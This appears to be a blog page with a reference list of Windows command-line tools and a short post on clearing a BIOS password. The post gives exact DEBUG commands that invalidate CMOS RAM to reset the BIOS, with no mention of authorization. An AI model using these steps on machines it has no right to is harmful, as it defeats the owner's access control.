GOTO Direct a batch program to jump to a labelled line

HELP Online Help
HFNETCHK Network Security Hotfix Checker

IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup

KILL Remove a program from memory

LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer.
LOGOFF Log a user off
LOGTIME Log the date and time in a file

MAPISEND Send email from the command line
MEM Display memory usage
MD Create new folders
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files

NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights

PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory

QGREP Search file(s) for lines that match a given pattern.

RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Read, Set or Delete registry keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files.
REPLACE Replace or update one file with another
RD Delete folder(s)
RDISK Create a Recovery Disk
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)

SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
ScriptIt Control GUI applications
SET Display, set, or remove environment variables
SETLOCAL Begin localisation of environment changes in a batch file
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
START Start a separate window to run a specified program or command
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration

TASKLIST List running applications and services
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file

USRSTAT List domain usernames and last login

VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label

WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands

XCACLS Change file permissions
XCOPY Copy files and folders
2:20 PM 0 comments

Flash BIOS via DOS

If you have access to the computer when it's turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory.
However, it might happen you don't have one of those programs when you have access to the computer, so you'd better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You'd better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:
O 70 17
O 71 17
O 70 FF
O 71 17
Invalidates CMOS RAM.
Should work on all AT motherboards
(XT motherboards don't have CMOS)
O 70 2E
O 71 FF
Note that the first letter is a "O" not the number "0". The numbers which follow are two bytes in hex format.